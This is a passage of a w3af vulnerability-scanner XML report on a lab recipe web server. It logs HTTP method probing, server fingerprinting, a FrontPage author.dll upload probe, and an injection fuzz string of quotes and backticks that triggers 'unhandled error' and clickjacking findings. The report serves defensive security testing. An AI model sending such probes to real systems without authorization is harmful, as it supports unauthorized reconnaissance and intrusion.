                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="589">
                <http-request>
                    <status>PROPPATCH http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="618">
                <http-request>
                    <status>POST http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="0" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="634">
                <http-request>
                    <status>COPY http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="646">
                <http-request>
                    <status>TRACE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="664">
                <http-request>
                    <status>PATCH http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="700">
                <http-request>
                    <status>UNSUBSCRIBE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="717">
                <http-request>
                    <status>MKACTIVITY http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about  has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href=''&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[1]" method="GET" name="Webserver fingerprint" plugin="hmap" severity="Information" url="None" var="None">
        <description>The most accurate fingerprint for this HTTP server is: &quot;JigSaw 2.2.2 (Solaris 8)&quot;.</description>
        <http-transactions>
            <http-transaction id="1">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[254, 292, 311]" method="GET" name="Unhandled error in web application" plugin="generic" severity="Low" url="http://10.12.68.43:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29" var="token">
        <description>An unhandled error, which could potentially translate to a vulnerability, was found at: &quot;http://10.12.68.43:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29&quot;, using HTTP method GET. The modified parameter was the URL filename, with value: &quot;d'kc&quot;z'gj'&quot;**5*(((;-*`)&quot;.</description>
        <long-description>Information Leakage is an application weakness where an application reveals sensitive data, such as technical details of the web application, environment, or user-specific data. Sensitive data may be used by an attacker to exploit the target web application, its hosting network, or its users. 

 In its most common form, information leakage is the result of one or more of the following conditions:
 * A failure to scrub out HTML/Script comments containing sensitive information
 * Improper application or server configurations
 * Improper application error handling
</long-description>
        <fix-guidance> * Ensure that the application source handles exceptions and errors in a such a way that no sensitive information is disclosed to the users
 * Configure the application server to handle and log any exceptions that the application might yield
</fix-guidance>
        <fix-effort>60</fix-effort>
        <references>
            <reference title="WASC threat classification" url="http://projects.webappsec.org/w/page/13246936/Information%20Leakage"/>
        </references>
        <http-transactions>
            <http-transaction id="254">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;Choucroute Garnie&lt;/h2&gt;

    &lt;ul&gt;
        &lt;li&gt;1/3 cup kosher salt, plus more for seasoning&lt;/li&gt;
        &lt;li&gt;2 tablespoons light brown sugar&lt;/li&gt;
        &lt;li&gt;3 pounds pork back ribs or baby back ribs, cut into 3 sections&lt;/li&gt;
        &lt;li&gt;6 pounds sauerkraut (in plastic bags), drained&lt;/li&gt;
        &lt;li&gt;1/4 cup duck or goose fat or peanut oil&lt;/li&gt;
        &lt;li&gt;1 large onion, coarsely chopped&lt;/li&gt;
        &lt;li&gt;4 large garlic cloves, coarsely chopped&lt;/li&gt;
        &lt;li&gt;20 juniper berries&lt;/li&gt;
        &lt;li&gt;3 large bay leaves&lt;/li&gt;
        &lt;li&gt;1/2 teaspoon caraway seeds&lt;/li&gt;
        &lt;li&gt;1 teaspoon freshly ground black pepper&lt;/li&gt;
        &lt;li&gt;3 cups chicken stock&lt;/li&gt;
        &lt;li&gt;1 1/2 cups Riesling or Pinot Gris&lt;/li&gt;
        &lt;li&gt;2 pounds Polish kielbasa, skinned and cut into 2-inch pieces&lt;/li&gt;
        &lt;li&gt;10 skinless hot dogs&lt;/li&gt;
        &lt;li&gt;One 2-pound piece of boneless boiled ham (3 to 4 inches wide), sliced 1/4 inch thick&lt;/li&gt;
        &lt;li&gt;2 pounds medium potatoes (about 10), peeled&lt;/li&gt;
        &lt;li&gt;Assorted mustards, for serving&lt;/li&gt;
    &lt;/ul&gt;

    &lt;a href='/choucroute'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="292">
                <http-request>
                    <status>GET http://10.12.68.43:31337/HK64uA3S HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about HK64uA3S has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='HK64uA3S'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="311">
                <http-request>
                    <status>GET http://10.12.68.43:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[254, 292, 361]" method="GET" name="Unhandled error in web application" plugin="generic" severity="Low" url="http://10.12.68.43:31337/" var="token">
        <description>An unhandled error, which could potentially translate to a vulnerability, was found at: &quot;http://10.12.68.43:31337/&quot;, using HTTP method GET. The modified parameter was the URL filename, with value: &quot;&quot;.</description>
        <long-description>Information Leakage is an application weakness where an application reveals sensitive data, such as technical details of the web application, environment, or user-specific data. Sensitive data may be used by an attacker to exploit the target web application, its hosting network, or its users. 

 In its most common form, information leakage is the result of one or more of the following conditions:
 * A failure to scrub out HTML/Script comments containing sensitive information
 * Improper application or server configurations
 * Improper application error handling
</long-description>
        <fix-guidance> * Ensure that the application source handles exceptions and errors in a such a way that no sensitive information is disclosed to the users
 * Configure the application server to handle and log any exceptions that the application might yield
</fix-guidance>
        <fix-effort>60</fix-effort>
        <references>
            <reference title="WASC threat classification" url="http://projects.webappsec.org/w/page/13246936/Information%20Leakage"/>
        </references>
        <http-transactions>
            <http-transaction id="254">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;Choucroute Garnie&lt;/h2&gt;

    &lt;ul&gt;
        &lt;li&gt;1/3 cup kosher salt, plus more for seasoning&lt;/li&gt;
        &lt;li&gt;2 tablespoons light brown sugar&lt;/li&gt;
        &lt;li&gt;3 pounds pork back ribs or baby back ribs, cut into 3 sections&lt;/li&gt;
        &lt;li&gt;6 pounds sauerkraut (in plastic bags), drained&lt;/li&gt;
        &lt;li&gt;1/4 cup duck or goose fat or peanut oil&lt;/li&gt;
        &lt;li&gt;1 large onion, coarsely chopped&lt;/li&gt;
        &lt;li&gt;4 large garlic cloves, coarsely chopped&lt;/li&gt;
        &lt;li&gt;20 juniper berries&lt;/li&gt;
        &lt;li&gt;3 large bay leaves&lt;/li&gt;
        &lt;li&gt;1/2 teaspoon caraway seeds&lt;/li&gt;
        &lt;li&gt;1 teaspoon freshly ground black pepper&lt;/li&gt;
        &lt;li&gt;3 cups chicken stock&lt;/li&gt;
        &lt;li&gt;1 1/2 cups Riesling or Pinot Gris&lt;/li&gt;
        &lt;li&gt;2 pounds Polish kielbasa, skinned and cut into 2-inch pieces&lt;/li&gt;
        &lt;li&gt;10 skinless hot dogs&lt;/li&gt;
        &lt;li&gt;One 2-pound piece of boneless boiled ham (3 to 4 inches wide), sliced 1/4 inch thick&lt;/li&gt;
        &lt;li&gt;2 pounds medium potatoes (about 10), peeled&lt;/li&gt;
        &lt;li&gt;Assorted mustards, for serving&lt;/li&gt;
    &lt;/ul&gt;

    &lt;a href='/choucroute'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="292">
                <http-request>
                    <status>GET http://10.12.68.43:31337/HK64uA3S HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about HK64uA3S has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='HK64uA3S'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="361">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[18, 37, 99, 100, 104, 126, 131, 172, 203, 205, 207, 208, 209, 211, 213, 214, 215, 216, 217, 218, 219, 220, 222, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 252, 255, 256, 258, 260, 262, 263, 264, 266, 267, 268, 269, 270, 271, 273, 274, 275, 276, 277, 278, 279, 280, 292, 305, 311, 312, 313, 314, 316, 317, 319, 320, 322, 325, 326, 327, 330, 331, 332, 334, 335, 337, 340, 342, 343, 344, 345, 346, 347, 348, 351, 352, 353, 354, 356, 357, 358, 359, 360, 362, 363, 364, 365, 367, 368, 370, 371, 374, 375, 376, 383, 390, 391, 407, 427, 428, 429, 430, 431, 432, 433, 434, 435, 436, 437, 439, 440, 441, 442, 443, 444, 446, 447, 448, 449, 451, 457, 464, 467, 471, 472, 473, 476, 481, 485, 492, 508, 519, 525, 528, 529, 534, 535, 537, 538, 539, 540, 544, 545, 546, 550, 560, 569, 573, 596, 606, 612, 653, 654, 657, 673, 675, 680, 693, 696, 701, 704, 712, 718, 721, 726, 729, 731, 739, 743, 745, 748, 755, 759, 760, 765, 768, 773, 775, 779, 791, 797, 806, 812, 821, 828, 837, 845, 854, 860, 867]" method="GET" name="Click-Jacking vulnerability" plugin="click_jacking" severity="Medium" url="None" var="None">
        <description>The whole target has no protection (X-Frame-Options header) against Click-Jacking attacks.</description>
        <long-description>Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages.

The server didn't return an `X-Frame-Options` header which means that this website could be at risk of a clickjacking attack. The `X-Frame-Options` HTTP response header can be used to indicate whether or not a browser should be allowed to render a page inside a frame or iframe. Sites can use this to avoid clickjacking attacks, by ensuring that their content is not embedded into other sites.</long-description>
        <fix-guidance>Configure your web server to include an X-Frame-Options header.</fix-guidance>
        <fix-effort>50</fix-effort>
        <references>
            <reference title="RFC-7034" url="http://tools.ietf.org/html/rfc7034"/>
            <reference title="Mozilla developer network" url="https://developer.mozilla.org/en-US/docs/Web/HTTP/X-Frame-Options"/>
            <reference title="OWASP Clickjacking document" url="https://www.owasp.org/index.php/Clickjacking"/>
        </references>
        <http-transactions>
            <http-transaction id="18">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="37">
                <http-request>
                    <status>PUT http://10.12.68.43:31337/ojGra HTTP/1.1</status>
                    <headers>
                        <header content="6" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="text/plain" field="Content-type"/>
                    </headers>
                    <body content-encoding="text">cCkAuQ</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about ojGra has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='ojGra'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="99">
                <http-request>
                    <status>GET http://10.12.68.43:31337/favicon.ico HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/favicon.ico&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="100">
                <http-request>
                    <status>GET http://10.12.68.43:31337/_vti_inf.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_inf.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="104">
                <http-request>
                    <status>GET http://10.12.68.43:31337/AKpPe.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/AKpPe.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="126">
                <http-request>
                    <status>GET http://10.12.68.43:31337/server-status HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about server-status has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='server-status'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="131">
                <http-request>
                    <status>POST http://10.12.68.43:31337/_vti_bin/_vti_aut/author.dll HTTP/1.1</status>
                    <headers>
                        <header content="158" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWV0aG9kPXB1dCBkb2N1bWVudDo0LjAuMi40NzE1JnNlcnZpY2VfbmFtZT0mZG9jdW1lbnQ9W2Rv
Y3VtZW50X25hbWU9L0FLcFBlLmh0bWw7bWV0YV9pbmZvPVtdXSZwdXRfb3B0aW9uPW92ZXJ3cml0
ZSZjb21tZW50PSZrZWVwX2NoZWNrZWRfb3V0PWZhbHNlCmxtdGguZVBwS0E=
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
